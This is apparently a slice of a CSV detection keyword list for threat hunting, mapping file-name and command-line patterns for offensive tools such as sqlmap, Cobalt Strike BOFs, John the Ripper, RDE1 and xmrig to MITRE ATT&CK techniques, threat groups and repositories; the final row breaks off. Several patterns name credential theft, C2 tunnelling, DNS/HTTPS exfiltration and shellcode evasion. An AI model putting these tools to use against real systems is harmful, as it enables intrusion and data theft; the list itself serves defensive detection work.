+"*sqlmap.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sqlmap/data/txt/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sqlmap4burp*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*sqlmapapi -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*sqlmapproject/sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*SQLmate*","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","4","393","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" +"*sqlninja*","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SQLRecon.exe*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*SQLRecon.git*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*SQLServer_Accessible_PotentialSensitiveData.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SQLServer_DefaultLogin.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*src/cracker.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/genmkvpwd.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/john.asm*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*src/obfuscator.c*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*src/Remote/chromeKey/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/lastpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_config/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_create/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_delete/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_start/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/ShellGhost.c*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*Src/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*src/tests/NESSIE/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*src/zerologon.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*src\unhook.c*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*src\unhook.c*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" +"*src\xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*srde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release dns -k *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release https -i *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srvsvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*ss -tunlp || netstat -tunlp*127.0.0.1*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*ssf.exe -D * -p * 127.0.0.1*","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" +"*ssfd.exe -p *","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" +"*ssh @ssh.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*ssh -N -R 4567:localhost:*root*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*ssh2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ssh2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sshame*","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","N/A","N/A","1","65","15","2023-04-17T12:44:57Z","2019-08-25T16:50:56Z" +"*ssh-auditor*","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","582","87","2023-02-25T01:34:02Z","2016-11-08T22:47:38Z" +"*sshbrute.py*","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*SSHBruteForce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*sshkey_persistence.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 